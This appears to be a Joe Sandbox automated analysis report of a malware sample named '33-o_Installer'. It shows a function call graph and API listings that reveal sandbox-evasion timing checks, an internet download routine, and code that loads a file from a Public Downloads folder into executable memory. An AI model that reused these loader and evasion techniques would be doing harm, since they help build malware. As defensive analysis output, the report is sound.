dd3f67 26250->26251 26252 dcb7b7 __lock 66 API calls 26251->26252 26254 dd3f6c __getstream 26251->26254 26253 dd3f7b 26252->26253 26255 dd40c6 26253->26255 26257 dd4053 26253->26257 26260 dd3ffb EnterCriticalSection 26253->26260 26261 dcb7b7 __lock 66 API calls 26253->26261 26264 dd3fd1 InitializeCriticalSectionAndSpinCount 26253->26264 26306 dd401d LeaveCriticalSection _doexit 26253->26306 26254->26161 26308 dd40db LeaveCriticalSection _doexit 26255->26308 26307 dc63fd 66 API calls __calloc_crt 26257->26307 26259 dd405c 26259->26255 26263 dd3e85 ___lock_fhandle 68 API calls 26259->26263 26260->26253 26262 dd400b LeaveCriticalSection 26260->26262 26261->26253 26262->26253 26266 dd40bd 26263->26266 26264->26253 26266->26255 26309 dca792 26267->26309 26270->26139 26271->26145 26272->26162 26273->26155 26274->26158 26275->26162 26276->26168 26277->26176 26278->26162 26279->26178 26280->26133 26281->26177 26282->26185 26283->26182 26284->26190 26285->26200 26286->26185 26287->26202 26288->26206 26289->26200 26290->26225 26291->26205 26292->26222 26293->26214 26294->26232 26295->26233 26296->26192 26297->26234 26298->26232 26299->26199 26300->26192 26301->26146 26302->26157 26303->26157 26304->26245 26305->26247 26306->26253 26307->26259 26308->26254 26310 dca7b1 _memset __call_reportfault 26309->26310 26311 dca7cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 26310->26311 26312 dca89d __call_reportfault 26311->26312 26315 dc65d1 26312->26315 26314 dca8b9 GetCurrentProcess TerminateProcess 26314->26137 26316 dc65d9 26315->26316 26317 dc65db IsDebuggerPresent 26315->26317 26316->26314 26323 dd2685 26317->26323 26320 dce015 SetUnhandledExceptionFilter UnhandledExceptionFilter 26321 dce03a GetCurrentProcess TerminateProcess 26320->26321 26322 dce032 __call_reportfault 26320->26322 26321->26314 26322->26321 26323->26320 25351 dc59d4 25401 dca9b0 25351->25401 25353 dc59e0 GetStartupInfoW 25354 dc59f4 HeapSetInformation 25353->25354 25356 dc59ff 25353->25356 25354->25356 25402 dcac41 HeapCreate 25356->25402 25357 dc5a4d 25358 dc5a58 25357->25358 25417 dc59ab 66 API calls 3 library calls 25357->25417 25418 dc98e5 86 API calls 4 library calls 25358->25418 25361 dc5a5e 25362 dc5a6a __RTC_Initialize 25361->25362 25363 dc5a62 25361->25363 25403 dcae9e 73 API calls __calloc_crt 25362->25403 25419 dc59ab 66 API calls 3 library calls 25363->25419 25365 dc5a69 25365->25362 25367 dc5a77 25368 dc5a7b 25367->25368 25369 dc5a83 GetCommandLineA 25367->25369 25420 dcb61f 66 API calls 3 library calls 25368->25420 25404 dcce83 71 API calls 2 library calls 25369->25404 25373 dc5a93 25421 dccdc8 95 API calls 3 library calls 25373->25421 25375 dc5a9d 25376 dc5aa9 25375->25376 25377 dc5aa1 25375->25377 25405 dccb52 94 API calls 7 library calls 25376->25405 25422 dcb61f 66 API calls 3 library calls 25377->25422 25381 dc5aae 25382 dc5aba 25381->25382 25383 dc5ab2 25381->25383 25406 dcb3fe 77 API calls 4 library calls 25382->25406 25423 dcb61f 66 API calls 3 library calls 25383->25423 25387 dc5ac1 25388 dc5acd 25387->25388 25389 dc5ac6 25387->25389 25407 dccaf3 94 API calls 2 library calls 25388->25407 25424 dcb61f 66 API calls 3 library calls 25389->25424 25392 dc5ad2 25394 dc5ad8 25392->25394 25408 dc2f3d 25392->25408 25394->25392 25397 dc5afc 25426 dcb601 66 API calls _doexit 25397->25426 25400 dc5b01 __getstream 25401->25353 25402->25357 25403->25367 25404->25373 25405->25381 25406->25387 25407->25392 25427 dc1186 25408->25427 25417->25358 25418->25361 25419->25365 25421->25375 25425 dcb5d5 66 API calls _doexit 25425->25397 25426->25400 25467 dc41ba GetSystemTimeAsFileTime 25427->25467 25429 dc1193 25469 dc434a 25429->25469 25431 dc435c 66 API calls _rand 25432 dc1199 25431->25432 25432->25431 25433 dc11de VirtualAlloc 25432->25433 25434 dc2e58 25433->25434 25435 dc2e5d __EH_prolog __write_nolock 25434->25435 25436 dc2e6c InternetOpenA 25435->25436 25437 dc2e8a InternetOpenUrlA 25436->25437 25438 dc2f30 VirtualFree 25436->25438 25439 dc2f27 InternetCloseHandle 25437->25439 25440 dc2ea7 25437->25440 25450 dc168b 25438->25450 25439->25438 25499 dc2d2e 25440->25499 25442 dc2ebb 25443 dc2f0f InternetCloseHandle 25442->25443 25445 dc2eed InternetReadFile 25442->25445 25446 dc2f02 25442->25446 25509 dc25c3 25442->25509 25520 dc2e1c 116 API calls std::ios_base::_Ios_base_dtor 25443->25520 25445->25442 25445->25446 25519 dc2c95 113 API calls Mailbox 25446->25519 25449 dc2f0d 25449->25443 25452 dc1690 25450->25452 25451 dc16f5 25460 dc11e1 GetTickCount64 Sleep GetTickCount64 25451->25460 25452->25451 25454 dc16ad 25452->25454 25935 dc437d 104 API calls 6 library calls 25452->25935 25456 dc16c5 25454->25456 25936 dc437d 104 API calls 6 library calls 25454->25936 25458 dc16dd 25456->25458 25937 dc437d 104 API calls 6 library calls 25456->25937 25458->25451 25938 dc437d 104 API calls 6 library calls 25458->25938 25939 dc4424 25460->25939 25462 dc122d CreateFileA GetFileSize VirtualAlloc ReadFile CloseHandle 25466 dc1283 25462->25466 25464 dc4424 99 API calls 25465 dc122c 25464->25465 25465->25462 25466->25397 25466->25425 25468 dc41ea __aulldiv 25467->25468 25468->25429 25472 dc979c 25469->25472 25477 dc9723 GetLastError 25472->25477 25474 dc97a4 25475 dc4354 25474->25475 25492 dcb61f 66 API calls 3 library calls 25474->25492 25475->25432 25493 dc95fe TlsGetValue 25477->25493 25480 dc9790 SetLastError 25480->25474 25481 dc9742 25496 dc63fd 66 API calls __calloc_crt 25481->25496 25483 dc974e 25483->25480 25484 dc9756 DecodePointer 25483->25484 25485 dc976b 25484->25485 25486 dc976f 25485->25486 25487 dc9787 25485->25487 25497 dc966f 66 API calls 4 library calls 25486->25497 25498 dc4452 66 API calls 2 library calls 25487->25498 25490 dc9777 GetCurrentThreadId 25490->25480 25491 dc978d 25491->25480 25494 dc962e 25493->25494 25495 dc9613 DecodePointer TlsSetValue 25493->25495 25494->25480 25494->25481 25495->25494 25496->25483 25497->25490 25498->25491 25500 dc2d33 __EH_prolog 25499->25500 25521 dc2813 25500->25521 25504 dc2d8b 25528 dc2483 25504->25528 25507 dc2dc4 25507->25442 25510 dc25c8 __EH_prolog 25509->25510 25678 dc221d 25510->25678 25514 dc25f1 25686 dc1c08 67 API calls 25514->25686 25515 dc266e 25687 dc24f0 67 API calls __EH_prolog 25515->25687 25517 dc267a 25517->25445 25519->25449 25520->25439 25522 dc2818 __EH_prolog 25521->25522 25541 dc257a 25522->25541 25525 dc1fa3 25659 dc1ce8 25525->25659 25527 dc1fae 25527->25504 25529 dc2488 __EH_prolog 25528->25529 25535 dc24db 25529->25535 25674 dc130b EnterCriticalSection LeaveCriticalSection std::locale::facet::_Incref 25529->25674 25531 dc24c0 25675 dc235f 114 API calls 8 library calls 25531->25675 25533 dc24ca 25534 dc10ee std::ios_base::_Ios_base_dtor 2 API calls 25533->25534 25534->25535 25535->25507 25536 dc153b 25535->25536 25537 dc15bd 25536->25537 25538 dc1551 25536->25538 25537->25507 25676 dc450c RaiseException 25538->25676 25677 dc3c86 66 API calls std::exception::_Copy_str 25538->25677 25550 dc1606 25541->25550 25546 dc25b1 25549 dc25bd 25546->25549 25565 dc37ca EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25546->25565 25547 dc153b 67 API calls 25547->25546 25549->25525 25551 dc153b 67 API calls 25550->25551 25552 dc1639 25551->25552 25566 dc448c 25552->25566 25556 dc164c 25557 dc2318 25556->25557 25558 dc2322 __EH_prolog 25557->25558 25608 dc1167 25558->25608 25565->25549 25567 dc4496 25566->25567 25569 dc1640 25567->25569 25574 dc44b2 std::exception::exception 25567->25574 25579 dc729e 25567->25579 25596 dcac6e DecodePointer 25567->25596 25569->25556 25578 dc10d4 82 API calls 3 library calls 25569->25578 25571 dc44f0 25598 dc3d0b 66 API calls std::exception::operator= 25571->25598 25573 dc44fa 25599 dc450c RaiseException 25573->25599 25574->25571 25597 dc65ba 76 API calls __cinit 25574->25597 25577 dc450b 25578->25556 25580 dc731b 25579->25580 25588 dc72ac 25579->25588 25606 dcac6e DecodePointer 25580->25606 25582 dc7321 25607 dca95f 66 API calls __getptd_noexit 25582->25607 25585 dc72da RtlAllocateHeap 25586 dc7313 25585->25586 25585->25588 25586->25567 25588->25585 25589 dc7307 25588->25589 25590 dc72b7 25588->25590 25594 dc7305 25588->25594 25603 dcac6e DecodePointer 25588->25603 25604 dca95f 66 API calls __getptd_noexit 25589->25604 25590->25588 25600 dcc970 66 API calls 2 library calls 25590->25600 25601 dcc7c1 66 API calls 7 library calls 25590->25601 25602 dcb37d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 25590->25602 25605 dca95f 66 API calls __getptd_noexit 25594->25605 25596->25567 25597->25571 25598->25573 25599->25577 25600->25590 25601->25590 25603->25588 25604->25594 25605->25586 25606->25582 25607->25586 25633 dc106a 25608->25633 25611 dc1e2e 25612 dc1e38 __EH_prolog 25611->25612 25613 dc314c std::_Lockit::_Lockit EnterCriticalSection 25612->25613 25614 dc1e47 25613->25614 25648 dc1035 25614->25648 25616 dc1e5e 25618 dc1e71 25616->25618 25654 dc1b85 114 API calls 3 library calls 25616->25654 25617 dc3174 _tidy_global LeaveCriticalSection 25619 dc1ec6 25617->25619 25618->25617 25629 dc10ee 25619->25629 25621 dc1e81 25622 dc1ea3 25621->25622 25655 dc3ce2 66 API calls std::exception::exception 25621->25655 25623 dc106a std::locale::facet::_Incref 2 API calls 25622->25623 25625 dc1eb3 25623->25625 25657 dc31a0 77 API calls std::locale::facet::_Facet_Register 25625->25657 25626 dc1e95 25656 dc450c RaiseException 25626->25656 25630 dc10f4 25629->25630 25631 dc10f9 25629->25631 25658 dc1092 EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit _tidy_global 25630->25658 25631->25546 25631->25547 25638 dc314c 25633->25638 25639 dc107b 25638->25639 25640 dc315e 25638->25640 25642 dc3174 25639->25642 25646 dc3b81 EnterCriticalSection 25640->25646 25643 dc108f 25642->25643 25644 dc317b 25642->25644 25643->25611 25647 dc3b91 LeaveCriticalSection 25644->25647 25646->25639 25647->25643 25649 dc1065 25648->25649 25650 dc1041 25648->25650 25649->25616 25651 dc314c std::_Lockit::_Lockit EnterCriticalSection 25650->25651 25652 dc104b 25651->25652 25653 dc3174 _tidy_global LeaveCriticalSection 25652->25653 25653->25649 25654->25621 25655->25626 25656->25622 25657->25618 25658->25631 25660 dc1cf2 __EH_prolog 25659->25660 25667 dc3a47 25660->25667 25663 dc448c std::locale::facet::_Facet_Register 77 API calls 25664 dc1d12 25663->25664 25666 dc1d1e Mailbox 25664->25666 25672 dc10d4 82 API calls 3 library calls 25664->25672 25666->25527 25668 dc448c std::locale::facet::_Facet_Register 77 API calls 25667->25668 25669 dc3a53 25668->25669 25673 dc3b61 InitializeCriticalSection 25669->25673 25671 dc1d07 25671->25663 25672->25666 25673->25671 25674->25531 25675->25533 25676->25538 25677->25538 25680 dc2222 __EH_prolog 25678->25680 25679 dc2257 25679->25514 25682 dc184b 25679->25682 25680->25679 25688 dc1f6a 67 API calls 25680->25688 25683 dc1907 25682->25683 25684 dc1864 _memmove 25682->25684 25683->25514 25684->25683 25689 dc297f 25684->25689 25686->25515 25687->25517 25688->25679 25691 dc2984 Mailbox __EH_prolog 25689->25691 25690 dc2993 Mailbox 25690->25684 25691->25690 25692 dc29f4 25691->25692 25693 dc29e0 25691->25693 25704 dc252d 77 API calls 2 library calls 25692->25704 25701 dc1fe5 25693->25701 25696 dc2aaf 25696->25690 25697 dc1fe5 _Fputc 99 API calls 25696->25697 25697->25690 25700 dc2a10 25700->25690 25700->25696 25705 dc566a 99 API calls 4 library calls 25700->25705 25706 dc2423 77 API calls 2 library calls 25700->25706 25707 dc4dc5 25701->25707 25703 dc1ff5 25703->25690 25704->25700 25705->25700 25706->25700 25708 dc4dd1 __getstream 25707->25708 25709 dc4dfc 25708->25709 25710 dc4de4 25708->25710 25726 dc50e4 25709->25726 25753 dca95f 66 API calls __getptd_noexit 25710->25753 25713 dc4de9 25754 dca90d 11 API calls _strcat_s 25713->25754 25716 dc4e77 25718 dc4e85 25716->25718 25732 dcb109 25716->25732 25764 dc4eb9 LeaveCriticalSection LeaveCriticalSection _fseek 25718->25764 25721 dc4df4 __getstream 25721->25703 25722 dc4e12 25722->25716 25762 dca95f 66 API calls __getptd_noexit 25722->25762 25724 dc4e6c 25763 dca90d 11 API calls _strcat_s 25724->25763 25727 dc5118 EnterCriticalSection 25726->25727 25728 dc50f6 25726->25728 25730 dc4e02 25727->25730 25728->25727 25729 dc50fe 25728->25729 25765 dcb7b7 25729->25765 25730->25716 25755 dcb0e3 25730->25755 25733 dcb0e3 __fclose_nolock 66 API calls 25732->25733 25734 dcb119 25733->25734 25735 dcb13b 25734->25735 25736 dcb124 25734->25736 25738 dcb13f 25735->25738 25745 dcb14c __stbuf 25735->25745 25828 dca95f 66 API calls __getptd_noexit 25736->25828 25829 dca95f 66 API calls __getptd_noexit 25738->25829 25740 dcb1ad 25741 dcb23c 25740->25741 25742 dcb1bc 25740->25742 25743 dcbee7 __write 97 API calls 25741->25743 25744 dcb1d3 25742->25744 25749 dcb1f0 25742->25749 25748 dcb129 25743->25748 25803 dcbee7 25744->25803 25745->25740 25745->25748 25750 dcb1a2 25745->25750 25830 dd23d6 25745->25830 25748->25718 25749->25748 25839 dcc501 71 API calls 6 library calls 25749->25839 25750->25740 25800 dcb26d 25750->25800 25753->25713 25754->25721 25756 dcb0ef 25755->25756 25757 dcb104 25755->25757 25933 dca95f 66 API calls __getptd_noexit 25756->25933 25757->25722 25759 dcb0f4 25934 dca90d 11 API calls _strcat_s 25759->25934 25761 dcb0ff 25761->25722 25762->25724 25763->25716 25764->25721 25766 dcb7cc 25765->25766 25767 dcb7df EnterCriticalSection 25765->25767 25772 dcb6f5 25766->25772 25767->25730 25769 dcb7d2 25769->25767 25799 dcb61f 66 API calls 3 library calls 25769->25799 25773 dcb701 __getstream 25772->25773 25774 dcb729 25773->25774 25775 dcb711 25773->25775 25777 dc63b8 __malloc_crt 65 API calls 25774->25777 25784 dcb737 __getstream 25774->25784 25776 dcc970 __FF_MSGBANNER 65 API calls 25775->25776 25778 dcb716 25776->25778 25779 dcb742 25777->25779 25780 dcc7c1 __NMSG_WRITE 65 API calls 25778->25780 25782 dcb758 25779->25782 25783 dcb749 25779->25783 25781 dcb71d 25780->25781 25785 dcb37d __mtinitlocknum GetModuleHandleW GetProcAddress ExitProcess 25781->25785 25787 dcb7b7 __lock 65 API calls 25782->25787 25786 dca95f _strcat_s 65 API calls 25783->25786 25784->25769 25788 dcb727 25785->25788 25786->25784 25789 dcb75f 25787->25789 25788->25774 25790 dcb767 InitializeCriticalSectionAndSpinCount 25789->25790 25791 dcb792 25789->25791 25793 dcb777 25790->25793 25795 dcb783 25790->25795 25792 dc4452 _free 65 API calls 25791->25792 25792->25795 25794 dc4452 _free 65 API calls 25793->25794 25796 dcb77d 25794->25796 25797 dcb7ae __mtinitlocknum LeaveCriticalSection 25795->25797 25798 dca95f _strcat_s 65 API calls 25796->25798 25797->25784 25798->25795 25840 dc63b8 25800->25840 25804 dcbef3 __getstream 25803->25804 25805 dcbefb 25804->25805 25806 dcbf16 25804->25806 25922 dca972 66 API calls __getptd_noexit 25805->25922 25807 dcbf22 25806->25807 25812 dcbf5c 25806->25812 25924 dca972 66 API calls __getptd_noexit 25807->25924 25810 dcbf00 25923 dca95f 66 API calls __getptd_noexit 25810->25923 25811 dcbf27 25925 dca95f 66 API calls __getptd_noexit 25811->25925 25846 dd3e85 25812->25846 25816 dcbf2f 25926 dca90d 11 API calls _strcat_s 25816->25926 25817 dcbf62 25819 dcbf84 25817->25819 25820 dcbf70 25817->25820 25927 dca95f 66 API calls __getptd_noexit 25819->25927 25856 dcb7ea 25820->25856 25822 dcbf08 __getstream 25822->25748 25824 dcbf89 25928 dca972 66 API calls __getptd_noexit 25824->25928 25825 dcbf7c 25929 dcbfb3 LeaveCriticalSection __unlock_fhandle 25825->25929 25828->25748 25829->25748 25831 dd23e3 25830->25831 25832 dd23f2 25830->25832 25930 dca95f 66 API calls __getptd_noexit 25831->25930 25835 dd2410 25832->25835 25931 dca95f 66 API calls __getptd_noexit 25832->25931 25834 dd23e8 25834->25750 25835->25750 25837 dd2403 25932 dca90d 11 API calls _strcat_s 25837->25932 25839->25748 25842 dc63c1 25840->25842 25841 dc729e _malloc 65 API calls 25841->25842 25842->25841 25843 dc63f7 25842->25843 25844 dc63d8 Sleep 25842->25844 25843->25740 25845 dc63ed 25844->25845 25845->25842 25845->25843 25847 dd3e91 __getstream 25846->25847 25848 dd3eeb 25847->25848 25849 dcb7b7 __lock 66 API calls 25847->25849 25850 dd3f0d __getstream 25848->25850 25851 dd3ef0 EnterCriticalSection 25848->25851 25852 dd3ebd 25849->25852 25850->25817 25851->25850 25853 dd3ed9 25852->25853 25854 dd3ec6 InitializeCriticalSectionAndSpinCount 25852->25854 25855 dd3f1b ___lock_fhandle LeaveCriticalSection 25853->25855 25854->25853 25855->25848 25857 dcb7f9 __write_nolock 25856->25857 25858 dcb84e 25857->25858 25859 dcb82f 25857->25859 25911 dcb824 25857->25911 25864 dcb8aa 25858->25864 25865 dcb88d 25858->25865 25861 dca972 __close 66 API calls 25859->25861 25860 dc65d1 __fltout2 5 API calls 25863 dcbee5 25860->25863 25862 dcb834 25861->25862 25868 dca95f _strcat_s 66 API calls 25862->25868 25863->25825 25866 dcb8c0 25864->25866 25867 dcb8b1 25864->25867 25869 dca972 __close 66 API calls 25865->25869 25872 dd23d6 __write_nolock 66 API calls 25866->25872 25870 dcc47c __lseeki64_nolock 68 API calls 25867->25870 25871 dcb83b 25868->25871 25873 dcb892 25869->25873 25874 dcb8bd 25870->25874 25875 dca90d _strcat_s 11 API calls 25871->25875 25876 dcb8c6 25872->25876 25877 dca95f _strcat_s 66 API calls 25873->25877 25874->25866 25875->25911 25878 dcbb68 25876->25878 25883 dc979c __getptd 66 API calls 25876->25883 25879 dcb89a 25877->25879 25881 dcbe18 WriteFile 25878->25881 25882 dcbb77 25878->25882 25880 dca90d _strcat_s 11 API calls 25879->25880 25880->25911 25887 dcbe4b GetLastError 25881->25887 25891 dcbb4a 25881->25891 25884 dcbb8a 25882->25884 25885 dcbc32 25882->25885 25886 dcb8e1 GetConsoleMode 25883->25886 25888 dcbe96 25884->25888 25893 dcbbd4 WriteFile 25884->25893 25892 dcbc3f 25885->25892 25902 dcbd0c 25885->25902 25886->25878 25889 dcb90a 25886->25889 25887->25891 25894 dca95f _strcat_s 66 API calls 25888->25894 25888->25911 25889->25878 25890 dcb91a GetConsoleCP 25889->25890 25890->25891 25919 dcb93d 25890->25919 25891->25888 25895 dcbe69 25891->25895 25891->25911 25892->25888 25898 dcbcae WriteFile 25892->25898 25893->25887 25900 dcbc08 25893->25900 25899 dcbeb9 25894->25899 25896 dcbe88 25895->25896 25897 dcbe74 25895->25897 25905 dca985 __dosmaperr 66 API calls 25896->25905 25903 dca95f _strcat_s 66 API calls 25897->25903 25898->25887 25906 dcbce2 25898->25906 25907 dca972 __close 66 API calls 25899->25907 25900->25884 25900->25891 25908 dcbc2d 25900->25908 25901 dcbd7d WideCharToMultiByte 25901->25887 25904 dcbdb4 WriteFile 25901->25904 25902->25888 25902->25901 25909 dcbe79 25903->25909 25910 dcbdeb GetLastError 25904->25910 25914 dcbddf 25904->25914 25905->25911 25906->25891 25906->25892 25906->25908 25907->25911 25908->25891 25913 dca972 __close 66 API calls 25909->25913 25910->25914 25911->25860 25912 dd25d6 __write_nolock 76 API calls 25912->25919 25913->25911 25914->25891 25914->25902 25914->25904 25914->25908 25915 dcb9e9 WideCharToMultiByte 25915->25891 25917 dcba1a WriteFile 25915->25917 25916 dd3cfb 78 API calls __fassign 25916->25919 25917->25887 25918 dcba41 25917->25918 25918->25887 25918->25891 25918->25919 25920 dd3ba3 WriteConsoleW CreateFileW __write_nolock 25918->25920 25921 dcba6e WriteFile 25918->25921 25919->25891 25919->25912 25919->25915 25919->25916 25919->25918 25920->25918 25921->25887 25921->25918 25922->25810 25923->25822 25924->25811 25925->25816 25926->25822 25927->25824 25928->25825 25929->25822 25930->25834 25931->25837 25932->25834 25933->25759 25934->25761 25935->25452 25936->25454 25937->25456 25938->25458 25942 dcac24 25939->25942 25945 dcab9f 25942->25945 25944 dc1216 25944->25462 25944->25464 25946 dcabab __stbuf __getstream 25945->25946 25947 dcabd7 25946->25947 25948 dcabc2 25946->25948 25950 dc50e4 __lock_file 67 API calls 25947->25950 25960 dca95f 66 API calls __getptd_noexit 25948->25960 25952 dcabdd 25950->25952 25951 dcabc7 25961 dca90d 11 API calls _strcat_s 25951->25961 25962 dc9a60 66 API calls 4 library calls 25952->25962 25955 dcabe8 25963 dc9afc 97 API calls __flush 25955->25963 25957 dcabd2 __getstream 25957->25944 25958 dcac01 25964 dcac1c LeaveCriticalSection LeaveCriticalSection _fseek 25958->25964 25960->25951 25961->25957 25962->25955 25963->25958 25964->25957
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                • API String ID: 0-99275883
                • Opcode ID: abf416081c55e3a979a18a15252d72a98f9324c2e2aee33887ac4b9c18f5e2f4
                • Instruction ID: b202f641a6c86da2d16e64e98e2696bec6fc04960869d4aaf23e563cc338b10b
                • Opcode Fuzzy Hash: abf416081c55e3a979a18a15252d72a98f9324c2e2aee33887ac4b9c18f5e2f4
                • Instruction Fuzzy Hash: 66824BB4A04609DFCB14CFA8D585AAEBBF2FF88315F158559E846DB2A1D730EC41CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: (o]q$(o]q$(o]q$,aq$,aq$Haq
                • API String ID: 0-387163720
                • Opcode ID: 490c7637e7eee5756cd84aa55ef28d857398c33b3cf6c253dae7d79c03cb26bd
                • Instruction ID: c4b54fb765b4e396f8a4ace3a882dffe69f30161c33bce02523a833ac7692588
                • Opcode Fuzzy Hash: 490c7637e7eee5756cd84aa55ef28d857398c33b3cf6c253dae7d79c03cb26bd
                • Instruction Fuzzy Hash: A9728074A002199FCB18DF69C895AAEBBF6FF88301F148569E845EB391DB34DD41CB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: Te]q
                • API String ID: 0-52440209
                • Opcode ID: 2dd56bcdbc2ba334bcb8be3327787e13deea0ad80dad84bc02c3dff9bd9a22eb
                • Instruction ID: 91235e63a38346e2da46ff213bf71b224cd06c55e805b66957be9d345d34b8b0
                • Opcode Fuzzy Hash: 2dd56bcdbc2ba334bcb8be3327787e13deea0ad80dad84bc02c3dff9bd9a22eb
                • Instruction Fuzzy Hash: 60629E34B002059FDB18EB78D469B2E77A7FB88305F158529E906DB394EF389D428BD1
                APIs
                • __EH_prolog.LIBCMT ref: 00DC25C8
                  • Part of subcall function 00DC221D: __EH_prolog.LIBCMT ref: 00DC2222
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
                • Instruction ID: 0f4348cfe00aaae5ec5a875b8840b17060a1bacba83958b5d89413b70ced6fd7
                • Opcode Fuzzy Hash: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
                • Instruction Fuzzy Hash: C611287590025AEFCF11DF98CA91EAEBBB4FF18314F10805EE51267252C7719A00DBB1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: \Vl
                • API String ID: 0-682378881
                • Opcode ID: 484268a176c6bea32cb2c0357db183a76d83ff5dbce8e317ce4de577d8e8c232
                • Instruction ID: f0c31071fc194b3314b4b755a82e15c79638b2d28a1474ef79adbe25547ec455
                • Opcode Fuzzy Hash: 484268a176c6bea32cb2c0357db183a76d83ff5dbce8e317ce4de577d8e8c232
                • Instruction Fuzzy Hash: 61B14C70E042099FDF14CFA9C98ABEDBBF2BF88314F148129D815E7264EB759845CB81
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 378a51f097e41025990eeadff10669bc2bf412499ada0baf5c3b425196db0f27
                • Instruction ID: a302c97e81392171162ac4c8ad9bc65fcae8a024da1b5af7aba9f05f58ad4c34
                • Opcode Fuzzy Hash: 378a51f097e41025990eeadff10669bc2bf412499ada0baf5c3b425196db0f27
                • Instruction Fuzzy Hash: 7BB14E70E04209DFDF14CFA9D9867AEBBF2BF88314F148529D819EB254EB749845CB81

                Control-flow Graph

                APIs
                • GetTickCount64.KERNEL32 ref: 00DC11EF
                • Sleep.KERNEL32(0000012C), ref: 00DC11F9
                • GetTickCount64.KERNEL32 ref: 00DC11FF
                  • Part of subcall function 00DC4424: __vwprintf_l.LIBCMT ref: 00DC4432
                • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00DC1244
                • GetFileSize.KERNEL32(00000000,00000000), ref: 00DC124E
                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00DC125F
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DC1270
                • CloseHandle.KERNEL32(00000000), ref: 00DC1277
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
                • String ID: C:\Users\Public\Downloads\ind.cod$sandbox!!!$v4:%d
                • API String ID: 1694741105-2571094725
                • Opcode ID: f70cca19f321a54023355d36b75e773eab9b248a6e6ae13df366eefbd3cebf04
                • Instruction ID: 005dfd39f032795c3166846b915f055a9d5a932cd741fe68b1da3b678b528f1e
                • Opcode Fuzzy Hash: f70cca19f321a54023355d36b75e773eab9b248a6e6ae13df366eefbd3cebf04
                • Instruction Fuzzy Hash: 7011B4736452147FE72057F5AC69FBBBF6CDB46770F200526FA09E3290D5A15C0082B1

                Control-flow Graph

                APIs
                • __EH_prolog.LIBCMT ref: 00DC2E5D
                • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00DC2E79
                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00DC2E96
                • InternetCloseHandle.WININET(?), ref: 00DC2F2A
                  • Part of subcall function 00DC2D2E: __EH_prolog.LIBCMT ref: 00DC2D33
                • InternetReadFile.WININET(?,?,00001000,?), ref: 00DC2EFC
                • InternetCloseHandle.WININET(?), ref: 00DC2F12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
